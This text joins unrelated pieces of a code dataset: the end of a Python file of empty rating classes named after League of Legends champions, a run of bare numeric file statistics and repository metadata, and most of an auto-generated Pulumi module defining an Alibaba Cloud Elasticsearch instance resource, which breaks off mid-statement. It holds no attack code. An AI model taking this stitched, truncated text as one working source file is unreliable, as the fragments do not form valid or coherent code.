class NA_Rakan_Bot_Shyvana(Ratings):
pass
class NA_Rakan_Bot_Singed(Ratings):
pass
class NA_Rakan_Bot_Sion(Ratings):
pass
class NA_Rakan_Bot_Sivir(Ratings):
pass
class NA_Rakan_Bot_Skarner(Ratings):
pass
class NA_Rakan_Bot_Sona(Ratings):
pass
class NA_Rakan_Bot_Soraka(Ratings):
pass
class NA_Rakan_Bot_Swain(Ratings):
pass
class NA_Rakan_Bot_Syndra(Ratings):
pass
class NA_Rakan_Bot_TahmKench(Ratings):
pass
class NA_Rakan_Bot_Taliyah(Ratings):
pass
class NA_Rakan_Bot_Talon(Ratings):
pass
class NA_Rakan_Bot_Taric(Ratings):
pass
class NA_Rakan_Bot_Teemo(Ratings):
pass
class NA_Rakan_Bot_Thresh(Ratings):
pass
class NA_Rakan_Bot_Tristana(Ratings):
pass
class NA_Rakan_Bot_Trundle(Ratings):
pass
class NA_Rakan_Bot_Tryndamere(Ratings):
pass
class NA_Rakan_Bot_TwistedFate(Ratings):
pass
class NA_Rakan_Bot_Twitch(Ratings):
pass
class NA_Rakan_Bot_Udyr(Ratings):
pass
class NA_Rakan_Bot_Urgot(Ratings):
pass
class NA_Rakan_Bot_Varus(Ratings):
pass
class NA_Rakan_Bot_Vayne(Ratings):
pass
class NA_Rakan_Bot_Veigar(Ratings):
pass
class NA_Rakan_Bot_Velkoz(Ratings):
pass
class NA_Rakan_Bot_Vi(Ratings):
pass
class NA_Rakan_Bot_Viktor(Ratings):
pass
class NA_Rakan_Bot_Vladimir(Ratings):
pass
class NA_Rakan_Bot_Volibear(Ratings):
pass
class NA_Rakan_Bot_Warwick(Ratings):
pass
class NA_Rakan_Bot_Xayah(Ratings):
pass
class NA_Rakan_Bot_Xerath(Ratings):
pass
class NA_Rakan_Bot_XinZhao(Ratings):
pass
class NA_Rakan_Bot_Yasuo(Ratings):
pass
class NA_Rakan_Bot_Yorick(Ratings):
pass
class NA_Rakan_Bot_Zac(Ratings):
pass
class NA_Rakan_Bot_Zed(Ratings):
pass
class NA_Rakan_Bot_Ziggs(Ratings):
pass
class NA_Rakan_Bot_Zilean(Ratings):
pass
class NA_Rakan_Bot_Zyra(Ratings):
pass
| 15.364508
| 46
| 0.761667
| 972
| 6,407
| 4.59465
| 0.151235
| 0.216301
| 0.370802
| 0.463502
| 0.797582
| 0.797582
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173404
| 6,407
| 416
| 47
| 15.401442
| 0.843278
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
aef1ea9de07acc572376bdac20627de47b216da0
| 88,415
|
py
|
Python
|
sdk/python/pulumi_alicloud/elasticsearch/instance.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/elasticsearch/instance.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/elasticsearch/instance.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['InstanceArgs', 'Instance']
@pulumi.input_type
class InstanceArgs:
def __init__(__self__, *,
data_node_amount: pulumi.Input[int],
data_node_disk_size: pulumi.Input[int],
data_node_disk_type: pulumi.Input[str],
data_node_spec: pulumi.Input[str],
version: pulumi.Input[str],
vswitch_id: pulumi.Input[str],
client_node_amount: Optional[pulumi.Input[int]] = None,
client_node_spec: Optional[pulumi.Input[str]] = None,
data_node_disk_encrypted: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
enable_kibana_private_network: Optional[pulumi.Input[bool]] = None,
enable_kibana_public_network: Optional[pulumi.Input[bool]] = None,
enable_public: Optional[pulumi.Input[bool]] = None,
instance_charge_type: Optional[pulumi.Input[str]] = None,
kibana_private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
kibana_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
kms_encrypted_password: Optional[pulumi.Input[str]] = None,
kms_encryption_context: Optional[pulumi.Input[Mapping[str, Any]]] = None,
master_node_spec: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
protocol: Optional[pulumi.Input[str]] = None,
public_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
setting_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
zone_count: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a Instance resource.
:param pulumi.Input[int] data_node_amount: The Elasticsearch cluster's data node quantity, between 2 and 50.
:param pulumi.Input[int] data_node_disk_size: The single data node storage space.
- `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
:param pulumi.Input[str] data_node_disk_type: The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
:param pulumi.Input[str] data_node_spec: The data node specifications of the Elasticsearch instance.
:param pulumi.Input[str] version: Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
:param pulumi.Input[str] vswitch_id: The ID of VSwitch.
:param pulumi.Input[int] client_node_amount: The Elasticsearch cluster's client node quantity, between 2 and 25.
:param pulumi.Input[str] client_node_spec: The client node spec. If specified, client node will be created.
:param pulumi.Input[bool] data_node_disk_encrypted: If encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
:param pulumi.Input[str] description: The description of instance. It a string of 0 to 30 characters.
:param pulumi.Input[bool] enable_kibana_private_network: Bool, default to false. When it set to true, the instance can close kibana private network access。
:param pulumi.Input[bool] enable_kibana_public_network: Bool, default to true. When it set to false, the instance can enable kibana public network access。
:param pulumi.Input[bool] enable_public: Bool, default to false. When it set to true, the instance can enable public network access。
:param pulumi.Input[str] instance_charge_type: Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_ype from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PostPaid` to `PrePaid` is not supported.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_private_whitelists: Set the Kibana's IP whitelist in private network.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_whitelists: Set the Kibana's IP whitelist in internet network.
:param pulumi.Input[str] kms_encrypted_password: An KMS encrypts password used to a instance. If the `password` is filled in, this field will be ignored, but you have to specify one of `password` and `kms_encrypted_password` fields.
:param pulumi.Input[Mapping[str, Any]] kms_encryption_context: An KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
:param pulumi.Input[str] master_node_spec: The dedicated master node spec. If specified, dedicated master node will be created.
:param pulumi.Input[str] password: The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
:param pulumi.Input[int] period: The duration that you will buy Elasticsearch instance (in month). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when to modify this value, the resource can renewal a `PrePaid` instance.
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_whitelists: Set the instance's IP whitelist in VPC network.
:param pulumi.Input[str] protocol: Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`.default is `HTTP`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] public_whitelists: Set the instance's IP whitelist in internet network.
:param pulumi.Input[str] resource_group_id: The Id of resource group which the Elasticsearch instance belongs.
:param pulumi.Input[Mapping[str, Any]] setting_config: The YML configuration of the instance.[Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
:param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
- key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
- value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
:param pulumi.Input[int] zone_count: The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
"""
pulumi.set(__self__, "data_node_amount", data_node_amount)
pulumi.set(__self__, "data_node_disk_size", data_node_disk_size)
pulumi.set(__self__, "data_node_disk_type", data_node_disk_type)
pulumi.set(__self__, "data_node_spec", data_node_spec)
pulumi.set(__self__, "version", version)
pulumi.set(__self__, "vswitch_id", vswitch_id)
if client_node_amount is not None:
pulumi.set(__self__, "client_node_amount", client_node_amount)
if client_node_spec is not None:
pulumi.set(__self__, "client_node_spec", client_node_spec)
if data_node_disk_encrypted is not None:
pulumi.set(__self__, "data_node_disk_encrypted", data_node_disk_encrypted)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_kibana_private_network is not None:
pulumi.set(__self__, "enable_kibana_private_network", enable_kibana_private_network)
if enable_kibana_public_network is not None:
pulumi.set(__self__, "enable_kibana_public_network", enable_kibana_public_network)
if enable_public is not None:
pulumi.set(__self__, "enable_public", enable_public)
if instance_charge_type is not None:
pulumi.set(__self__, "instance_charge_type", instance_charge_type)
if kibana_private_whitelists is not None:
pulumi.set(__self__, "kibana_private_whitelists", kibana_private_whitelists)
if kibana_whitelists is not None:
pulumi.set(__self__, "kibana_whitelists", kibana_whitelists)
if kms_encrypted_password is not None:
pulumi.set(__self__, "kms_encrypted_password", kms_encrypted_password)
if kms_encryption_context is not None:
pulumi.set(__self__, "kms_encryption_context", kms_encryption_context)
if master_node_spec is not None:
pulumi.set(__self__, "master_node_spec", master_node_spec)
if password is not None:
pulumi.set(__self__, "password", password)
if period is not None:
pulumi.set(__self__, "period", period)
if private_whitelists is not None:
pulumi.set(__self__, "private_whitelists", private_whitelists)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if public_whitelists is not None:
pulumi.set(__self__, "public_whitelists", public_whitelists)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
if setting_config is not None:
pulumi.set(__self__, "setting_config", setting_config)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if zone_count is not None:
pulumi.set(__self__, "zone_count", zone_count)
@property
@pulumi.getter(name="dataNodeAmount")
def data_node_amount(self) -> pulumi.Input[int]:
"""
The Elasticsearch cluster's data node quantity, between 2 and 50.
"""
return pulumi.get(self, "data_node_amount")
@data_node_amount.setter
def data_node_amount(self, value: pulumi.Input[int]):
pulumi.set(self, "data_node_amount", value)
@property
@pulumi.getter(name="dataNodeDiskSize")
def data_node_disk_size(self) -> pulumi.Input[int]:
"""
The single data node storage space.
- `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
"""
return pulumi.get(self, "data_node_disk_size")
@data_node_disk_size.setter
def data_node_disk_size(self, value: pulumi.Input[int]):
pulumi.set(self, "data_node_disk_size", value)
@property
@pulumi.getter(name="dataNodeDiskType")
def data_node_disk_type(self) -> pulumi.Input[str]:
"""
The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
"""
return pulumi.get(self, "data_node_disk_type")
@data_node_disk_type.setter
def data_node_disk_type(self, value: pulumi.Input[str]):
pulumi.set(self, "data_node_disk_type", value)
@property
@pulumi.getter(name="dataNodeSpec")
def data_node_spec(self) -> pulumi.Input[str]:
"""
The data node specifications of the Elasticsearch instance.
"""
return pulumi.get(self, "data_node_spec")
@data_node_spec.setter
def data_node_spec(self, value: pulumi.Input[str]):
pulumi.set(self, "data_node_spec", value)
@property
@pulumi.getter
def version(self) -> pulumi.Input[str]:
"""
Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: pulumi.Input[str]):
pulumi.set(self, "version", value)
@property
@pulumi.getter(name="vswitchId")
def vswitch_id(self) -> pulumi.Input[str]:
"""
The ID of VSwitch.
"""
return pulumi.get(self, "vswitch_id")
@vswitch_id.setter
def vswitch_id(self, value: pulumi.Input[str]):
pulumi.set(self, "vswitch_id", value)
@property
@pulumi.getter(name="clientNodeAmount")
def client_node_amount(self) -> Optional[pulumi.Input[int]]:
"""
The Elasticsearch cluster's client node quantity, between 2 and 25.
"""
return pulumi.get(self, "client_node_amount")
@client_node_amount.setter
def client_node_amount(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "client_node_amount", value)
@property
@pulumi.getter(name="clientNodeSpec")
def client_node_spec(self) -> Optional[pulumi.Input[str]]:
"""
The client node spec. If specified, client node will be created.
"""
return pulumi.get(self, "client_node_spec")
@client_node_spec.setter
def client_node_spec(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_node_spec", value)
@property
@pulumi.getter(name="dataNodeDiskEncrypted")
def data_node_disk_encrypted(self) -> Optional[pulumi.Input[bool]]:
"""
If encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
"""
return pulumi.get(self, "data_node_disk_encrypted")
@data_node_disk_encrypted.setter
def data_node_disk_encrypted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "data_node_disk_encrypted", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of instance. It a string of 0 to 30 characters.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableKibanaPrivateNetwork")
def enable_kibana_private_network(self) -> Optional[pulumi.Input[bool]]:
"""
Bool, default to false. When it set to true, the instance can close kibana private network access。
"""
return pulumi.get(self, "enable_kibana_private_network")
@enable_kibana_private_network.setter
def enable_kibana_private_network(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_kibana_private_network", value)
@property
@pulumi.getter(name="enableKibanaPublicNetwork")
def enable_kibana_public_network(self) -> Optional[pulumi.Input[bool]]:
"""
Bool, default to true. When it set to false, the instance can enable kibana public network access。
"""
return pulumi.get(self, "enable_kibana_public_network")
@enable_kibana_public_network.setter
def enable_kibana_public_network(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_kibana_public_network", value)
@property
@pulumi.getter(name="enablePublic")
def enable_public(self) -> Optional[pulumi.Input[bool]]:
"""
Bool, default to false. When it set to true, the instance can enable public network access。
"""
return pulumi.get(self, "enable_public")
@enable_public.setter
def enable_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_public", value)
@property
@pulumi.getter(name="instanceChargeType")
def instance_charge_type(self) -> Optional[pulumi.Input[str]]:
"""
Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_ype from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PostPaid` to `PrePaid` is not supported.
"""
return pulumi.get(self, "instance_charge_type")
@instance_charge_type.setter
def instance_charge_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_charge_type", value)
@property
@pulumi.getter(name="kibanaPrivateWhitelists")
def kibana_private_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set the Kibana's IP whitelist in private network.
"""
return pulumi.get(self, "kibana_private_whitelists")
@kibana_private_whitelists.setter
def kibana_private_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "kibana_private_whitelists", value)
@property
@pulumi.getter(name="kibanaWhitelists")
def kibana_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set the Kibana's IP whitelist in internet network.
"""
return pulumi.get(self, "kibana_whitelists")
@kibana_whitelists.setter
def kibana_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "kibana_whitelists", value)
@property
@pulumi.getter(name="kmsEncryptedPassword")
def kms_encrypted_password(self) -> Optional[pulumi.Input[str]]:
"""
An KMS encrypts password used to a instance. If the `password` is filled in, this field will be ignored, but you have to specify one of `password` and `kms_encrypted_password` fields.
"""
return pulumi.get(self, "kms_encrypted_password")
@kms_encrypted_password.setter
def kms_encrypted_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_encrypted_password", value)
@property
@pulumi.getter(name="kmsEncryptionContext")
def kms_encryption_context(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
An KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
"""
return pulumi.get(self, "kms_encryption_context")
@kms_encryption_context.setter
def kms_encryption_context(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "kms_encryption_context", value)
@property
@pulumi.getter(name="masterNodeSpec")
def master_node_spec(self) -> Optional[pulumi.Input[str]]:
"""
The dedicated master node spec. If specified, dedicated master node will be created.
"""
return pulumi.get(self, "master_node_spec")
@master_node_spec.setter
def master_node_spec(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_node_spec", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def period(self) -> Optional[pulumi.Input[int]]:
"""
The duration that you will buy Elasticsearch instance (in month). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when to modify this value, the resource can renewal a `PrePaid` instance.
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period", value)
@property
@pulumi.getter(name="privateWhitelists")
def private_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set the instance's IP whitelist in VPC network.
"""
return pulumi.get(self, "private_whitelists")
@private_whitelists.setter
def private_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "private_whitelists", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
"""
Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`.default is `HTTP`.
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="publicWhitelists")
def public_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set the instance's IP whitelist in internet network.
"""
return pulumi.get(self, "public_whitelists")
@public_whitelists.setter
def public_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "public_whitelists", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The Id of resource group which the Elasticsearch instance belongs.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
@property
@pulumi.getter(name="settingConfig")
def setting_config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
The YML configuration of the instance.[Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
"""
return pulumi.get(self, "setting_config")
@setting_config.setter
def setting_config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "setting_config", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A mapping of tags to assign to the resource.
- key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
- value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="zoneCount")
def zone_count(self) -> Optional[pulumi.Input[int]]:
"""
The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
"""
return pulumi.get(self, "zone_count")
@zone_count.setter
def zone_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "zone_count", value)
@pulumi.input_type
class _InstanceState:
def __init__(__self__, *,
client_node_amount: Optional[pulumi.Input[int]] = None,
client_node_spec: Optional[pulumi.Input[str]] = None,
data_node_amount: Optional[pulumi.Input[int]] = None,
data_node_disk_encrypted: Optional[pulumi.Input[bool]] = None,
data_node_disk_size: Optional[pulumi.Input[int]] = None,
data_node_disk_type: Optional[pulumi.Input[str]] = None,
data_node_spec: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
enable_kibana_private_network: Optional[pulumi.Input[bool]] = None,
enable_kibana_public_network: Optional[pulumi.Input[bool]] = None,
enable_public: Optional[pulumi.Input[bool]] = None,
instance_charge_type: Optional[pulumi.Input[str]] = None,
kibana_domain: Optional[pulumi.Input[str]] = None,
kibana_port: Optional[pulumi.Input[int]] = None,
kibana_private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
kibana_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
kms_encrypted_password: Optional[pulumi.Input[str]] = None,
kms_encryption_context: Optional[pulumi.Input[Mapping[str, Any]]] = None,
master_node_spec: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
port: Optional[pulumi.Input[int]] = None,
private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
protocol: Optional[pulumi.Input[str]] = None,
public_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
setting_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
version: Optional[pulumi.Input[str]] = None,
vswitch_id: Optional[pulumi.Input[str]] = None,
zone_count: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering Instance resources.
:param pulumi.Input[int] client_node_amount: The Elasticsearch cluster's client node quantity, between 2 and 25.
:param pulumi.Input[str] client_node_spec: The client node spec. If specified, client node will be created.
:param pulumi.Input[int] data_node_amount: The Elasticsearch cluster's data node quantity, between 2 and 50.
:param pulumi.Input[bool] data_node_disk_encrypted: If encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
:param pulumi.Input[int] data_node_disk_size: The single data node storage space.
- `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
:param pulumi.Input[str] data_node_disk_type: The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
:param pulumi.Input[str] data_node_spec: The data node specifications of the Elasticsearch instance.
:param pulumi.Input[str] description: The description of instance. It a string of 0 to 30 characters.
:param pulumi.Input[str] domain: Instance connection domain (only VPC network access supported).
:param pulumi.Input[bool] enable_kibana_private_network: Bool, default to false. When it set to true, the instance can close kibana private network access。
:param pulumi.Input[bool] enable_kibana_public_network: Bool, default to true. When it set to false, the instance can enable kibana public network access。
:param pulumi.Input[bool] enable_public: Bool, default to false. When it set to true, the instance can enable public network access。
:param pulumi.Input[str] instance_charge_type: Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_ype from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PostPaid` to `PrePaid` is not supported.
:param pulumi.Input[str] kibana_domain: Kibana console domain (Internet access supported).
:param pulumi.Input[int] kibana_port: Kibana console port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_private_whitelists: Set the Kibana's IP whitelist in private network.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_whitelists: Set the Kibana's IP whitelist in internet network.
:param pulumi.Input[str] kms_encrypted_password: An KMS encrypts password used to a instance. If the `password` is filled in, this field will be ignored, but you have to specify one of `password` and `kms_encrypted_password` fields.
:param pulumi.Input[Mapping[str, Any]] kms_encryption_context: An KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
:param pulumi.Input[str] master_node_spec: The dedicated master node spec. If specified, dedicated master node will be created.
:param pulumi.Input[str] password: The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
:param pulumi.Input[int] period: The duration that you will buy Elasticsearch instance (in month). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when to modify this value, the resource can renewal a `PrePaid` instance.
:param pulumi.Input[int] port: Instance connection port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_whitelists: Set the instance's IP whitelist in VPC network.
:param pulumi.Input[str] protocol: Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`.default is `HTTP`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] public_whitelists: Set the instance's IP whitelist in internet network.
:param pulumi.Input[str] resource_group_id: The Id of resource group which the Elasticsearch instance belongs.
:param pulumi.Input[Mapping[str, Any]] setting_config: The YML configuration of the instance.[Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
:param pulumi.Input[str] status: The Elasticsearch instance status. Includes `active`, `activating`, `inactive`. Some operations are denied when status is not `active`.
:param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
- key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
- value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
:param pulumi.Input[str] version: Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
:param pulumi.Input[str] vswitch_id: The ID of VSwitch.
:param pulumi.Input[int] zone_count: The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
"""
if client_node_amount is not None:
pulumi.set(__self__, "client_node_amount", client_node_amount)
if client_node_spec is not None:
pulumi.set(__self__, "client_node_spec", client_node_spec)
if data_node_amount is not None:
pulumi.set(__self__, "data_node_amount", data_node_amount)
if data_node_disk_encrypted is not None:
pulumi.set(__self__, "data_node_disk_encrypted", data_node_disk_encrypted)
if data_node_disk_size is not None:
pulumi.set(__self__, "data_node_disk_size", data_node_disk_size)
if data_node_disk_type is not None:
pulumi.set(__self__, "data_node_disk_type", data_node_disk_type)
if data_node_spec is not None:
pulumi.set(__self__, "data_node_spec", data_node_spec)
if description is not None:
pulumi.set(__self__, "description", description)
if domain is not None:
pulumi.set(__self__, "domain", domain)
if enable_kibana_private_network is not None:
pulumi.set(__self__, "enable_kibana_private_network", enable_kibana_private_network)
if enable_kibana_public_network is not None:
pulumi.set(__self__, "enable_kibana_public_network", enable_kibana_public_network)
if enable_public is not None:
pulumi.set(__self__, "enable_public", enable_public)
if instance_charge_type is not None:
pulumi.set(__self__, "instance_charge_type", instance_charge_type)
if kibana_domain is not None:
pulumi.set(__self__, "kibana_domain", kibana_domain)
if kibana_port is not None:
pulumi.set(__self__, "kibana_port", kibana_port)
if kibana_private_whitelists is not None:
pulumi.set(__self__, "kibana_private_whitelists", kibana_private_whitelists)
if kibana_whitelists is not None:
pulumi.set(__self__, "kibana_whitelists", kibana_whitelists)
if kms_encrypted_password is not None:
pulumi.set(__self__, "kms_encrypted_password", kms_encrypted_password)
if kms_encryption_context is not None:
pulumi.set(__self__, "kms_encryption_context", kms_encryption_context)
if master_node_spec is not None:
pulumi.set(__self__, "master_node_spec", master_node_spec)
if password is not None:
pulumi.set(__self__, "password", password)
if period is not None:
pulumi.set(__self__, "period", period)
if port is not None:
pulumi.set(__self__, "port", port)
if private_whitelists is not None:
pulumi.set(__self__, "private_whitelists", private_whitelists)
if protocol is not None:
